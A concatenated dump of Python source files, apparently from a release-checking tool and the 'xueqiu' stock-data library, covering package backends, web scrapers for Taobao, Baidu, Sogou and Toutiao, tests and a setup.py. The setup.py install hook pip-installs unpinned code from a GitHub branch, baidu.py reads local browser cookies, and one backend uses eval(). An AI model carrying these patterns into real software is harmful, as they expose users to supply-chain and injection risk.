example = 'https://www.jetbrains.com/idea/'
p = { # product
'idea': 'IIC', # IIU
'pycharm-edu': 'PCC',
'pycharm': 'PCP',
'phpstorm': 'PS',
'webstorm': 'WS',
'ruby': 'RM',
'objc': 'AC',
'clion': 'CL',
'datagrip': 'DG',
'rider': 'RD'
}
def __init__(self, url):
super(JetbrainsBackend, self).__init__()
self._url = url
self._rule_type = "json"
if self.domain in self._url:
self.pk = [self.p[i] for i in self.p.keys()
if i in self._url][0] # product key
def get_urls(self, branch=None):
json_url = 'https://data.services.jetbrains.com/products/releases' \
'?code=%(code)s&latest=true&type=%(branch)s'
return json_url % {'code': self.pk, 'branch': branch}, # release|eap
def get_rules(self):
log.debug('use %s backend rule for %s package.' %
(self.name, self._url.split('/')[-1]))
return [("['%s'][0]['date']" % self.pk, ""), ("", "")]
def _post_json(self, rules):
log.debug("rules: %s, %s" % (rules[0], rules[1]))
time = eval("self.resp.json()%s" % rules[0])
return self._process_data(time), "none" # (date, commit)
@classmethod
def isrelease(cls, url):
return True
```
#### File: checker/backends/nvidia.py
```python
from checker.backends import BaseBackend
from checker import logger
import re
log = logger.getLogger(__name__)
class NvidiaBackend(BaseBackend):
"""for projects hosted on nvidia.com"""
name = 'NVIDIA'
domain = 'nvidia.com'
example = 'http://http.download.nvidia.com/XFree86/Linux-x86_64'
def __init__(self, url):
super(NvidiaBackend, self).__init__()
self._url = url
self._rule_type = "regex"
def get_urls(self, branch=None):
return self._url,
def get_rules(self):
log.debug('use %s backend rule for %s package.' %
(self.name, self._url.split('/')[-1]))
return [("\d{2}-\w{3}-\d{4}", ""), ("", "")]
def _post_regex(self, rules):
log.debug("rules: %s, %s" % (rules[0], rules[1]))
time = re.findall(rules[0], self.resp.text)
return self._process_data(time), "none" # (date, commit)
@classmethod
def isrelease(cls, url):
return True
```
#### File: checker/backends/packagist.py
```python
from checker.backends import BaseBackend
from checker import logger
log = logger.getLogger(__name__)
class PackagistBackend(BaseBackend):
"""for projects hosted on packagist.org"""
name = 'Packagist'
domain = 'packagist.org'
example = 'https://packagist.org/packages/phpunit/php-code-coverage'
def __init__(self, url):
super(PackagistBackend, self).__init__()
self._url = url
self._rule_type = "xpath"
def get_urls(self, branch=None):
# https://packagist.org/p/%(user)s/%(name)s.json
return self._url,
def get_rules(self):
log.debug('use %s backend rule for %s package.' %
(self.name, self._url.split('/')[-1]))
return [("//span[@class='release-date']/text()",
"//span[@class='source-reference']/text()"), ("", "")]
@classmethod
def isrelease(cls, url):
return True
```
#### File: checker/backends/pagure.py
```python
from checker.backends import BaseBackend
from checker import logger
log = logger.getLogger(__name__)
class PagureBackend(BaseBackend):
"""for projects hosted on pagure.io"""
name = 'Pagure'
domain = 'pagure.io'
example = 'https://pagure.io/pagure'
def __init__(self, url):
super(PagureBackend, self).__init__()
self._url = url
self._rule_type = "xpath"
def get_urls(self, branch=None):
return ['https://releases.pagure.org/%s/' % self._url.split('/')[-1],
'%s/commits/%s' % (self._url, branch)]
def get_rules(self):
log.debug('use %s backend rule for %s package.' %
(self.name, self._url.split('/')[-1]))
return [("//td[3][contains(text(), '-')]/text()", ""),
("//h5/a//span/@title", "//div[1]/h5/a/@href")]
@classmethod
def isrelease(cls, url):
if cls.domain in url and 'commits' in url:
return False
else:
return True
```
#### File: checker/backends/rubygems.py
```python
from checker.backends import BaseBackend
from checker import logger
log = logger.getLogger(__name__)
class RubygemsBackend(BaseBackend):
"""for projects hosted on rubygems.org"""
name = 'Rubygems'
domain = 'rubygems.org'
example = 'https://rubygems.org/gems/bio'
def __init__(self, url):
super(RubygemsBackend, self).__init__()
self._url = url
self._rule_type = "json"
def get_urls(self, branch=None):
return ['http://rubygems.org/api/v1/versions/%(name)s.json' % {
'name': self._url.split('/')[-1]}]
def get_rules(self):
log.debug('use %s backend rule for %s package.' %
(self.name, self._url.split('/')[-1]))
return [("['created_at']", ""), ("", "")]
def _post_json(self, rules):
log.debug("rules: %s, %s" % (rules[0], rules[1]))
times = [i['created_at'] for i in self.resp.json()]
return self._process_data(times), "none" # (date, commit)
@classmethod
def isrelease(cls, url):
return True
```
#### File: checker/backends/wps.py
```python
from checker.backends import BaseBackend
from checker import logger
log = logger.getLogger(__name__)
class WpsBackend(BaseBackend):
"""for projects hosted on wps-community.org"""
name = 'WPS Community'
domain = 'wps-community.org'
example = 'http://wps-community.org/downloads'
def __init__(self, url):
super(WpsBackend, self).__init__()
self._url = url
self._rule_type = "xpath"
def get_urls(self, branch=None):
return self._url,
def get_rules(self):
log.debug('use %s backend rule for %s package.' %
(self.name, 'wps-office'))
return [("substring(//h2/small/text(), 2, 10)", ""), ("", "")]
@classmethod
def isrelease(cls, url):
return True
```
#### File: repo-checker/example/taobao_scrapy.py
```python
from scrapy.spiders import CrawlSpider
from scrapy.http import Request
from tutorial.items import TaobaoItem
import json
class TaobaoSpider(CrawlSpider):
name = "taobao"
allowed_domains = ["taobao.com"]
start_urls = ["https://s.taobao.com/list?seller_type=taobao&json=on"]
def start_requests(self):
for url in self.start_urls:
yield Request(url, self.parse_item, headers={
"User-Agent": "Mozilla/5.0 (X11; Linux; rv:47.0) Gecko/20100101 Firefox/47.0"
})
def parse_item(self, response):
d = json.loads(response.body.decode())
if 'common' in d['mods']['nav']['data']:
for i in d['mods']['nav']['data']['common'][0]['sub']:
url = self.start_urls[0] + "&cat=%s" % i['value']
yield Request(url, callback=self.parse_item)
else:
output, filename = '', ''
pv = d['mods']['pager']['data']['currentPage'] * d['mods']['pager']['data']['pageSize']
url = self.start_urls[0] + "&cat=%s&s=%s" % (
d['mods']['nav']['data']['breadcrumbs']['catpath'][-1]['value'],
pv)
for item in d['mods']['itemlist']['data']['auctions']:
output += "%s,%s,%s,%s,%s,%s,%s,%s,%s,%s\n" % (
item['category'],
item['user_id'],
item['nick'],
item['nid'],
item['title'],
item['item_loc'],
item['reserve_price'],
item['view_price'],
item['detail_url'],
item['shopLink'])
for i in d['mods']['nav']['data']['breadcrumbs']['catpath']:
filename += '%s.'%i['name']
with open(filename.replace('/','_')+'csv', 'a+') as f:
f.write(output)
yield Request(url, callback=self.parse_item)
```
#### File: repo-checker/example/xz2rpm.py
```python
import os
import sys
import re
import json
import time
import argparse
class Package:
def __init__(self):
self.opts = {
'input_file': '',
'author': '',
'mail': ''
}
self.helper()
self.data = self.openfile(self.opts['input_file'])
self.pkg = {
'pkgbase': '',
'pkgname': '',
'pkgver': '',
'pkgrel': '',
'epoch': '',
'pkgdesc': '',
'arch': '',
'url': '',
'license': '',
'groups': '',
'depends': '',
'optdepends': '',
'makedepends': '',
'checkdepends': '',
'provides': '',
'conflicts': '',
'replaces': '',
'backup': '',
'options': '',
'install': '',
'changelog': '',
'source': '',
'noextract': '',
'prepare': '',
'build': '',
'check': '',
'package': ''
}
self.pkg_dict = {
'"': '',
"'": '',
'$pkgname': self.pkg['pkgname'],
'$startdir': '%{_topdir}',
'$srcdir': '%{_builddir}',
'$pkgdir': '%{buildroot}'
}
def openfile(self, filename):
with open(filename, 'r') as fs:
content = fs.read()
return content
def _tojson(self, data):
# TODO
return json.loads(data, 'utf-8')
def parse(self, item):
real_item = None
patterns = ['=\((.*?)\)', '=(.*)', '\(\)\s*\{(.*)\}']
for i in patterns:
pattern = item + i
if i == '=(.*)':
val = re.compile(pattern)
else:
val = re.compile(pattern, re.S)
if not val.search(self.data):
continue
else:
self.pkg[item] = val.search(self.data).groups()[0]
real_item = item
break
return real_item
def replace_words(self, text, word_dict):
''' https://segmentfault.com/q/1010000002474308 '''
yo = re.compile('|'.join(map(re.escape, word_dict)))
def translate(match):
return word_dict[match.group(0)]
return yo.sub(translate, text)
def get_item(self):
list(map(self.parse, self.pkg))
for i in self.pkg:
self.pkg[i] = self.replace_words(self.pkg[i], self.pkg_dict)
def output(self):
self.get_item()
author = self.opts['author']
email = self.opts['mail']
date = time.strftime('%a %b %d %Y', time.localtime())
content = '''%global debug_package %nil
Name: {name}
Epoch: {epoch}
Version: {ver}
Release: {rel}%?dist
Summary: {desc}
Group: {group}
License: {license}
URL: {url}
Source0: {src}
BuildArch: {arch}
BuildRequires: {makereq}
Requires: {req}
Recommends: {optreq}
Provides: {prov}
Conflicts: {conf}
Obsoletes: {repl}
%description
{desc}
%prep
%setup -q
{prep}
%build
%configure
make %?_smp_mflags
{build}
%install
%make_install
{install}
%check
{check}
%post
/bin/touch --no-create %_datadir/icons/hicolor &>/dev/null ||:
/usr/bin/update-desktop-database -q ||:
%postun
if [ $1 -eq 0 ]; then
/bin/touch --no-create %_datadir/icons/hicolor &>/dev/null ||:
/usr/bin/gtk-update-icon-cache -f -t -q %_datadir/icons/hicolor ||:
fi
/usr/bin/update-desktop-database -q ||:
%posttrans
/usr/bin/gtk-update-icon-cache -f -t -q %_datadir/icons/hicolor ||:
%files
%defattr(-,root,root,-)
%doc README
%license LICENSE
%changelog
* {date} {author} <{email}> - {ver}-{rel}
- '''.format(
name=self.pkg['pkgname'],
epoch=self.pkg['epoch'],
ver=self.pkg['pkgver'],
rel=self.pkg['pkgrel'],
desc=self.pkg['pkgdesc'],
group=self.pkg['groups'],
license=self.pkg['license'],
url=self.pkg['url'],
src=self.pkg['source'],
arch=self.pkg['arch'],
makereq=self.pkg['makedepends'],
req=self.pkg['depends'],
optreq=self.pkg['optdepends'],
prov=self.pkg['provides'],
conf=self.pkg['conflicts'],
repl=self.pkg['replaces'],
prep=self.pkg['prepare'],
build=self.pkg['build'],
install=self.pkg['package'],
check=self.pkg['check'],
date=date,
author=author,
email=email
)
print(content)
def helper(self):
''' display help information.'''
parser = argparse.ArgumentParser(description='PKGBUILD translate to Spec.')
parser.add_argument('-f', '--file', metavar='PATH', type=str,
dest='files', action='store', default='PKGBUILD',
help='PKGBUILD file'
)
parser.add_argument('-a', '--author', metavar='NAME', type=str,
dest='author', action='store', default='<NAME>',
help='author of package'
)
parser.add_argument('-m', '--mail', metavar='MAIL', type=str,
dest='mail', action='store', default='<EMAIL>',
help='email address of author'
)
args = parser.parse_args()
if args.files and os.path.exists(args.files):
self.opts['input_file'] = args.files
elif args.files is not None:
print("xz2rpm: cannot access '{}': No such file or directory"
.format(args.files))
sys.exit()
if args.author:
self.opts['author'] = args.author
if args.mail:
self.opts['mail'] = args.mail
if __name__ == '__main__':
item = Package()
item.output()
``` |
{
"source": "1dot75cm/xueqiu",
"score": 2
} |
#### File: 1dot75cm/xueqiu/setup.py
```python
from setuptools import setup, find_packages
from setuptools.command.test import test as TestCommand
from setuptools.command.install import install
from subprocess import getoutput
import sys
import re
class PyTest(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = ['-v']
self.test_suite = True
def run_tests(self):
import pytest
err_code = pytest.main(self.test_args)
sys.exit(err_code)
class PostInstall(install):
"""run post install."""
pkgs = ' git+https://github.com/1dot75cm/browsercookie@master'
def run(self):
install.run(self)
print(getoutput('pip install'+self.pkgs))
def gendeps(filename):
with open(filename, 'r', encoding='utf8') as f:
return re.split("\n", f.read())
with open('xueqiu/__init__.py', 'rt', encoding='utf8') as f:
xueqiu = dict(re.findall(r'__(.*?)__ = "(.*?)"', f.read()))
setup(
name=xueqiu['pkgname'],
version=xueqiu['version'],
license=xueqiu['license'],
url=xueqiu['url'],
author=xueqiu['author'],
author_email=xueqiu['email'],
description=xueqiu['descript'],
long_description=open('README.md', encoding='utf8').read(),
long_description_content_type='text/markdown',
packages=find_packages(exclude=['tests']),
package_dir={'xueqiu': 'xueqiu'},
include_package_data=True,
platforms='any',
install_requires=gendeps('requirements.txt'),
tests_require=gendeps('requirements-test.txt'),
test_suite="tests",
cmdclass={'install': PostInstall, 'test': PyTest},
keywords=['xueqiu', 'snowball', 'stock', 'api', 'api client', 'wrappers'],
# https://pypi.org/classifiers/
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Console',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Topic :: Utilities'
]
)
```
#### File: xueqiu/tests/test_model_functions.py
```python
import pytest
from xueqiu.model import create_or_refresh_stocks
from xueqiu import news
from xueqiu import search
from xueqiu import Post
def test_search():
# search stock
s = search("中国平安")
assert s['list'][0].name == "中国平安"
# search post
p = search("你了解红利基金吗", query_type="post")
assert isinstance(p['list'][0], Post)
# search user
u = search("红利基金", query_type="user")
assert u['list'][0].name == "红利基金"
def test_news():
assert isinstance(news()['list'][0], Post)
def test_create_or_refresh_stocks():
stocks = ['601318', '000333', '00700', 'TSLA', 'RHT']
s = create_or_refresh_stocks(stocks)
assert s[0].name == "中国平安"
assert s[1].name == "美的集团"
assert s[2].name == "腾讯控股"
assert s[3].name == "特斯拉"
assert s[4].name == "红帽"
```
#### File: xueqiu/tests/test_utils_module.py
```python
import pytest
from xueqiu import api
from xueqiu import utils
from requests.cookies import cookielib
def test_get_cookies():
cj = utils.get_cookies()
assert isinstance(cj, cookielib.LWPCookieJar)
assert cj.filename == api.cookie_file
def test_get_session():
sess = utils.get_session()
resp = sess.get(api.prefix)
assert resp.ok
def test_clean_html():
html = "<span><a href=''>Hello</a></span>"
assert utils.clean_html(html) == 'Hello'
def test_check_symbol():
stock = utils.check_symbol(601318)
assert stock == "SH601318"
stock = utils.check_symbol('000651')
assert stock == "SZ000651"
stock = utils.check_symbol('00700')
assert stock == "00700"
stock = utils.check_symbol('HUYA')
assert stock == "HUYA"
def test_exrate():
ex = utils.exrate("2019-01-10", "EUR")
assert ex == [7.8765, 7.8443]
ex = utils.exusd(date="2019-01-10")
assert ex == [6.816, 6.8526]
ex = utils.exhkd("2019-01-10")
assert ex == [0.86959, 0.87419]
```
#### File: xueqiu/xueqiu/baidu.py
```python
from .utils import get_cookies
from .utils import sess
from .utils import str2date
from . import api
import arrow
import requests
import pandas as pd
#https://github.com/Kandy990125/baidu_spider_master
#https://github.com/longxiaofei/spider-BaiduIndex/blob/master/new_spider_without_selenium/config.py
PROVINCE_CODE = {
'山东':901, '贵州':902, '江西':903, '重庆':904, '内蒙古':905,
'湖北':906, '辽宁':907, '湖南':908, '福建':909, '上海':910,
'北京':911, '广西':912, '广东':913, '四川':914, '云南':915,
'江苏':916, '浙江':917, '青海':918, '宁夏':919, '河北':920,
'黑龙江':921, '吉林':922, '天津':923, '陕西':924, '甘肃':925,
'新疆':926, '河南':927, '安徽':928, '山西':929, '海南':930,
'台湾':931, '西藏':932, '香港':933, '澳门':934, '全国':0}
CITY_CODE = {
'重庆市':'11', '上海市':'57', '北京市':'514', '天津市':'164', '香港区':'663', '澳门区':'664',
#山东
'济南': '1', '滨州': '76', '青岛': '77', '烟台': '78', '临沂': '79', '潍坊': '80',
'淄博': '81', '东营': '82', '聊城': '83', '菏泽': '84', '枣庄': '85', '德州': '86',
'威海': '88', '济宁': '352', '泰安': '353', '莱芜': '356', '日照': '366',
#贵州
'贵阳': '2', '黔南': '3', '六盘水': '4', '遵义': '59', '黔东南': '61',
'铜仁': '422', '安顺': '424', '毕节': '426', '黔西南': '588',
#江西
'南昌': '5', '九江': '6', '鹰潭': '7', '抚州': '8', '上饶': '9', '赣州': '10',
'吉安': '115', '萍乡': '136', '景德镇': '137', '新余': '246', '宜春': '256',
#内蒙古
'呼和浩特': '20', '包头': '13', '鄂尔多斯': '14', '巴彦淖尔': '15', '乌海': '16',
'阿拉善盟': '17', '锡林郭勒盟': '19', '赤峰': '21', '通辽': '22', '呼伦贝尔': '25',
'乌兰察布': '331', '兴安盟': '333',
#湖北
'武汉': '28', '黄石': '30', '荆州': '31', '襄阳': '32', '黄冈': '33', '荆门': '34',
'宜昌': '35', '十堰': '36', '随州': '37', '恩施': '38', '鄂州': '39', '咸宁': '40',
'孝感': '41', '仙桃': '42', '天门': '73', '潜江': '74', '神农架': '687',
#辽宁
'沈阳': '150', '大连': '29', '盘锦': '151', '鞍山': '215', '朝阳': '216', '锦州': '217',
'铁岭': '218', '丹东': '219', '本溪': '220', '营口': '221', '抚顺': '222', '阜新': '223',
'辽阳': '224', '葫芦岛': '225',
#湖南
'长沙': '43', '岳阳': '44', '衡阳': '45', '株洲': '46', '湘潭': '47', '益阳': '48',
'郴州': '49', '湘西': '65', '娄底': '66', '怀化': '67', '常德': '68', '张家界': '226',
'永州': '269', '邵阳': '405',
#福建
'福州': '50', '莆田': '51', '三明': '52', '龙岩': '53', '厦门': '54', '泉州': '55',
'漳州': '56', '宁德': '87', '南平': '253',
#广西
'南宁': '90', '柳州': '89', '桂林': '91', '贺州': '92', '贵港': '93', '玉林': '118',
'河池': '119', '北海': '128', '钦州': '129', '防城港': '130', '百色': '131',
'梧州': '132', '来宾': '506', '崇左': '665',
#广东
'广州': '95', '深圳': '94', '东莞': '133', '云浮': '195', '佛山': '196', '湛江': '197',
'江门': '198', '惠州': '199', '珠海': '200', '韶关': '201', '阳江': '202', '茂名': '203',
'潮州': '204', '揭阳': '205', '中山': '207', '清远': '208', '肇庆': '209', '河源': '210',
'梅州': '211', '汕头': '212', '汕尾': '213',
#四川
'成都': '97', '宜宾': '96', '绵阳': '98', '广元': '99', '遂宁': '100', '巴中': '101',
'内江': '102', '泸州': '103', '南充': '104', '德阳': '106', '乐山': '107', '广安': '108',
'资阳': '109', '自贡': '111', '攀枝花': '112', '达州': '113', '雅安': '114', '眉山': '291',
'甘孜': '417', '阿坝': '457', '凉山': '479',
#云南
'昆明': '117', '玉溪': '123', '楚雄': '124', '大理': '334', '昭通': '335', '红河': '337',
'曲靖': '339', '丽江': '342', '临沧': '350', '文山': '437', '保山': '438', '普洱': '666',
'西双版纳': '668', '德宏': '669', '怒江': '671', '迪庆': '672',
#江苏
'南京': '125', '苏州': '126', '无锡': '127', '连云港': '156', '淮安': '157',
'扬州': '158', '泰州': '159', '盐城': '160', '徐州': '161', '常州': '162',
'南通': '163', '镇江': '169', '宿迁': '172',
#浙江
'杭州': '138', '丽水': '134', '金华': '135', '温州': '149', '台州': '287', '衢州': '288',
'宁波': '289', '绍兴': '303', '嘉兴': '304', '湖州': '305', '舟山': '306',
#青海
'西宁': '139', '海西': '608', '海东': '652', '玉树': '659', '海南': '676', '海北': '682',
'黄南': '685', '果洛': '688',
#宁夏
'银川': '140', '吴忠': '395', '固原': '396', '石嘴山': '472', '中卫': '480',
#河北
'石家庄': '141', '衡水': '143', '张家口': '144', '承德': '145', '秦皇岛': '146',
'廊坊': '147', '沧州': '148', '保定': '259', '唐山': '261', '邯郸': '292', '邢台': '293',
#黑龙江
'哈尔滨': '152', '大庆': '153', '伊春': '295', '大兴安岭': '297', '黑河': '300',
'鹤岗': '301', '七台河': '302', '齐齐哈尔': '319', '佳木斯': '320', '牡丹江': '322',
'鸡西': '323', '绥化': '324', '双鸭山': '359',
#吉林
'长春': '154', '四平': '155', '辽源': '191', '松原': '194', '吉林': '270', '通化': '407',
'白山': '408', '白城': '410', '延边': '525',
#陕西
'西安': '165', '铜川': '271', '安康': '272', '宝鸡': '273', '商洛': '274', '渭南': '275',
'汉中': '276', '咸阳': '277', '榆林': '278', '延安': '401',
#甘肃
'兰州': '166', '庆阳': '281', '定西': '282', '武威': '283', '酒泉': '284', '张掖': '285',
'嘉峪关': '286', '平凉': '307', '天水': '308', '白银': '309', '金昌': '343',
'陇南': '344', '临夏': '346', '甘南': '673',
#新疆
'乌鲁木齐': '467', '石河子': '280', '吐鲁番': '310', '昌吉': '311', '哈密': '312',
'阿克苏': '315', '克拉玛依': '317', '博尔塔拉': '318', '阿勒泰': '383', '喀什': '384',
'和田': '386', '巴音郭楞': '499', '伊犁': '520', '塔城': '563', '克孜勒苏柯尔克孜': '653',
'五家渠': '661', '阿拉尔': '692', '图木舒克': '693',
#河南
'郑州': '168', '南阳': '262', '新乡': '263', '开封': '264', '焦作': '265', '平顶山': '266',
'许昌': '268', '安阳': '370', '驻马店': '371', '信阳': '373', '鹤壁': '374', '周口': '375',
'商丘': '376', '洛阳': '378', '漯河': '379', '濮阳': '380', '三门峡': '381', '济源': '667',
#安徽
'合肥': '189', '铜陵': '173', '黄山': '174', '池州': '175', '宣城': '176', '巢湖': '177',
'淮南': '178', '宿州': '179', '六安': '181', '滁州': '182', '淮北': '183', '阜阳': '184',
'马鞍山': '185', '安庆': '186', '蚌埠': '187', '芜湖': '188', '亳州': '391',
#山西
'太原': '231', '大同': '227', '长治': '228', '忻州': '229', '晋中': '230', '临汾': '232',
'运城': '233', '晋城': '234', '朔州': '235', '阳泉': '236', '吕梁': '237',
#海南
'海口': '239', '万宁': '241', '琼海': '242', '三亚': '243', '儋州': '244', '东方': '456',
'五指山': '582', '文昌': '670', '陵水': '674', '澄迈': '675', '乐东': '679', '临高': '680',
'定安': '681', '昌江': '683', '屯昌': '684', '保亭': '686', '白沙': '689', '琼中': '690',
#西藏
'拉萨': '466', '日喀则': '516', '那曲': '655', '林芝': '656', '山南': '677', '昌都': '678',
'阿里': '691'}
AREAS = PROVINCE_CODE.copy()
AREAS.update(CITY_CODE)
sess.cookies = requests.cookies.merge_cookies(sess.cookies,
get_cookies('.baidu.com', lazy=False))
class BaseIndex:
"""base index class."""
def __init__(self):
pass
@staticmethod
def get_date_range(start, end, period='year'):
"""date range is one year."""
start = arrow.get(start)
end = arrow.get(end)
for i in arrow.Arrow.range(period, start, end):
dt = {'year':i.shift(years=1), 'quarter':i.shift(quarters=1),
'month':i.shift(months=1), 'week':i.shift(weeks=1)}
if i == end: break
tmp = dt[period]>=end and end or dt[period].shift(days=-1)
yield (i, tmp)
class BaiduIndex(BaseIndex):
"""Baidu search/feed/news index.
Usage::
>>> idx = BaiduIndex()
>>> idx.live('股票,基金','深圳')
>>> idx.search('股票',begin='-3m',area='上海')
>>> idx.region_distribution('股票','-6w') # 地域分布
>>> idx.social_attribute('股票','-15d') # 人群属性
"""
cookie = None
def __init__(self, keyword='', begin='-1m', end=arrow.now(), index='search', area='全国', cookie=''):
self._keywords = keyword.find(',')>0 and keyword.split(',') or [keyword]
self.start_date = arrow.get(str2date(begin).date()) # arrow.range includes the end date
self.end_date = arrow.get(arrow.get(end).date())
self.index_type = index
self.area = area
self.cookie = cookie or BaiduIndex.cookie
self._key = None
self._uniqid = None
self._result = {kw: [] for kw in self._keywords}
def search(self, keyword, *args, **kwargs):
"""Get keyword related baidu index data.
:param keyword: baidu index for keyword.
:param begin: (optional) start date, default is `-1m`.
:param end: (optional) end date, default is `now`.
:param index: (optional) index type, default is `search`.
value: search, feed, news
:param area: (optional) baidu index by region, default is `全国`.
value: please see `AREAS` variable
:param cookie: (optional) your cookie strings.
:return: pd.DataFrame
"""
self.__init__(keyword, *args, **kwargs)
for st,ed in self.get_date_range(self.start_date, self.end_date):
for d in self.get_encrypt_data(st, ed):
encdata = d.get('all') or d
self.end_date = arrow.get(encdata['endDate'])
self._result[d.get('word') or d.get('key')] += \
self.decrypt(self.get_key(), encdata['data'])
date_range = arrow.Arrow.range('day', self.start_date, self.end_date)
self._result['date'] = pd.to_datetime([i.date() for i in date_range])
self.result = pd.DataFrame(self._result).set_index('date')
return self.result
def live(self, keyword, area='全国', *args, **kwargs):
self.__init__(keyword, index='live', area=area, *args, **kwargs)
for d in self.get_encrypt_data():
region = 0 if self.area == '全国' else str(AREAS[self.area])
encdata = d.get('index')[region]
period = [arrow.get(i) for i in encdata['period'].split('|')]
self._result[d.get('key')] += \
self.decrypt(self.get_key(), encdata['_all'])
date_range = arrow.Arrow.range('hour', period[0], period[1])
self._result['date'] = pd.to_datetime([i.datetime for i in date_range])
self.result = pd.DataFrame(self._result).set_index('date')
return self.result
def region_distribution(self, keyword, *args, **kwargs):
"""region distribution statistics. 地域分布"""
self.__init__(keyword, *args, **kwargs)
params = {'region': AREAS[self.area],
'word': ','.join(self._keywords),
'startDate': self.start_date.format('YYYY-MM-DD'),
'endDate': self.end_date.format('YYYY-MM-DD')}
cookie = self.cookie and {'Cookie': self.cookie} or {}
resp = sess.get(api.baidu_region, params=params, headers=cookie).json()
self.region = {i['key']: {'city':i['city'], 'prov':i['prov'], 'period':i['period']}
for i in resp['data']['region']}
return self.region
def social_attribute(self, keyword, *args, **kwargs):
"""social attribute statistics. 人群属性(年龄分布, 性别分布)"""
self.__init__(keyword, *args, **kwargs)
params = {'wordlist': ','.join(self._keywords),
'startdate': self.start_date.format('YYYYMMDD'),
'enddate': self.end_date.format('YYYYMMDD')}
cookie = self.cookie and {'Cookie': self.cookie} or {}
resp = sess.get(api.baidu_social, params=params, headers=cookie).json()
self.social = {i['word']: {'age':i['str_age'], 'sex':i['str_sex']} for i in resp['data']}
return self.social
def get_encrypt_data(self, start_date=None, end_date=None):
"""get encrypted data."""
idx = {'live': api.baidu_search_live,
'search': api.baidu_search_index,
'feed': api.baidu_feed_index,
'news': api.baidu_news_index}
params = {'word': ','.join(self._keywords)}
if self.index_type == 'live':
params.update({'region': AREAS[self.area]})
else:
params.update({
'area': AREAS[self.area],
'startDate': start_date.format('YYYY-MM-DD'),
'endDate': end_date.format('YYYY-MM-DD')
})
cookie = self.cookie and {'Cookie': self.cookie} or {}
resp = sess.get(idx[self.index_type], params=params, headers=cookie)
#status: 0 ok, 10000 no login, 10002 bad request
data = resp.json()['data']
self._uniqid = data['uniqid']
encrypt_data = data.get('userIndexes') or data.get('index') or data.get('result')
return encrypt_data
def get_key(self):
cookie = self.cookie and {'Cookie': self.cookie} or {}
resp = sess.get(api.baidu_data_key, params={'uniqid':self._uniqid}, headers=cookie)
self._key = resp.json()['data']
return self._key
@staticmethod
def decrypt(key, data):
"""decrypt data."""
kv = {key[i]: key[len(key)//2+i] for i in range(len(key)//2)}
dec = ''.join([kv[i] for i in data])
return dec.split(',')
class SogouIndex(BaseIndex):
"""Sogou search index.
Usage::
>>> idx = SogouIndex()
>>> idx.search('股票',begin='-3m')
"""
head = {'Origin': 'http://zhishu.sogou.com',
'Referer':'http://zhishu.sogou.com'}
dkey = {'all': 'SEARCH_ALL',
'pc': 'SEARCH_PC',
'mobile': 'SEARCH_WAP',
'wechat': 'MEDIA_WECHAT'}
def __init__(self, keyword='', begin='-1m', end=arrow.now(), data_type='all'):
self._keywords = keyword.find(',')>0 and keyword.split(',') or [keyword]
self.start_date = arrow.get(str2date(begin).date()) # arrow.range includes the end date
self.end_date = arrow.get(arrow.get(end).date())
self.data_type = data_type
self._result = {kw: [] for kw in self._keywords}
def search(self, keyword, *args, **kwargs):
"""Get keyword related sogou index data.
:param keyword: sogou index for keyword.
:param begin: (optional) start date, default is `-1m`.
:param end: (optional) end date, default is `now`.
:param data_type: (optional) data type, default is `all`.
value: all, pc, mobile, wechat
:return: pd.DataFrame
"""
self.__init__(keyword, *args, **kwargs)
for st,ed in self.get_date_range(self.start_date, self.end_date):
for k,d in zip(self._keywords, self.get_data(st, ed)):
self._result[k] += [i['pv'] for i in d]
date_range = arrow.Arrow.range('day', self.start_date, self.end_date)
self._result['date'] = pd.to_datetime([i.date() for i in date_range])
self.result = pd.DataFrame(self._result).set_index('date')
return self.result
def get_data(self, start_date, end_date):
"""get data."""
params = {
'kwdNamesStr': ','.join(self._keywords),
'startDate': start_date.format('YYYYMMDD'),
'endDate': end_date.format('YYYYMMDD'),
'dataType': self.dkey[self.data_type],
'queryType': 'INPUT'
}
resp = sess.get(api.sogou_search_index, params=params, headers=self.head)
data = resp.json()['data']['pvList']
return data
class ToutiaoIndex(BaseIndex):
"""Toutiao search index.
Usage::
>>> idx = ToutiaoIndex()
>>> idx.search('股票',begin='-3m')
"""
head = {'Origin': 'https://index.toutiao.com',
'Referer':'https://index.toutiao.com'}
def __init__(self, keyword='', begin='-1m', end=arrow.now()):
self._keywords = keyword.find(',')>0 and keyword.split(',') or [keyword]
self.start_date = arrow.get(str2date(begin).date()) # arrow.range includes the end date
self.end_date = arrow.get(arrow.get(end).date())
self._result = {kw: [] for kw in self._keywords}
def search(self, keyword, *args, **kwargs):
"""Get keyword related toutiao index data.
:param keyword: toutiao index for keyword.
:param begin: (optional) start date, default is `-1m`.
:param end: (optional) end date, default is `now`.
:return: pd.DataFrame
"""
self.__init__(keyword, *args, **kwargs)
for st,ed in self.get_date_range(self.start_date, self.end_date, 'month'):
for k,d in zip(self._keywords, self.get_data(st, ed)):
self._result[k] += d
date_range = arrow.Arrow.range('day', self.start_date, self.end_date)
self._result['date'] = pd.to_datetime([i.date() for i in date_range])
self.result = pd.DataFrame(self._result).set_index('date')
return self.result.applymap(lambda x: int(x))
def get_data(self, start_date, end_date):
"""get data."""
for i in self._keywords:
params = {'region': 0, 'category': 0,
'is_hourly': 0, 'keyword': i,
'start': start_date.format('YYYYMMDD'),
'end': end_date.format('YYYYMMDD')}
resp = sess.get(api.toutiao_search_index, params=params, headers=self.head)
yield resp.json()['trends'][i]
```
#### File: xueqiu/xueqiu/movie.py
```python
from . import api
from .utils import sess
from lxml import html
import pandas as pd
import numpy as np
import arrow
import json
head = {
'Origin':'https://piaofang.maoyan.com',
'Referer':'https://piaofang.maoyan.com',
'X-Requested-With':''
}
def get_movie_id(search: str):
resp = sess.get(api.movie_search%search, headers=head)
tree = html.fromstring(resp.text)
title = tree.xpath('//article/div/text()')
mid = tree.xpath('//article/@data-url')
return [[k.split('/')[-1],v] for k,v in zip(mid,title)]
def get_movie_boxinfo_byid(mid: int):
"""movie box office history data."""
def process_data(x):
x = x.find('<')>=0 and x[1:] or x
if x.find('万')>=0:
x = float(x[:-1])*10000
elif x.find('%')>=0:
x = float(x[:-1])/100
elif x == '--':
x = np.nan
return float(x)
resp = sess.get(api.movie_history % mid, headers=head)
tree = html.fromstring(resp.text)
dt = json.loads(tree.xpath('//script[@id="pageData"]/text()')[0])
